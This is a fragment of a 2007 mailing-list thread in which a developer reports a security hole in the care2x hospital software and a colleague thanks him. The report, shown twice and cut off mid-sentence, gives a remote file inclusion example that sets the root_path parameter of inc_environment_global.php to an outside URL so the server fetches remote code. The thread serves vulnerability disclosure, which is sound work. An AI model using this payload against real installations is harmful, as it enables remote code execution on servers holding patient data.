Hi Robert,
thanks a lot for this very important information.
Elpidio
On 1/30/07, Robert Meggle <[EMAIL PROTECTED]> wrote:
Hello developers,
We found a security lack what will give the possibility to misuse our
care2x. Try this out:
http:///include/inc_environment_global.php?root_path=
http:
Hello developers,
We found a security lack what will give the possibility to misuse our
care2x. Try this out:
http:///include/inc_environment_global.php?root_path=http://see-your-ip
.info/cmd.do?
(just bring the root_path-variable as GET to the script).
Inside of inc_enviroment_global.php there i
2 matches
Mail list logo
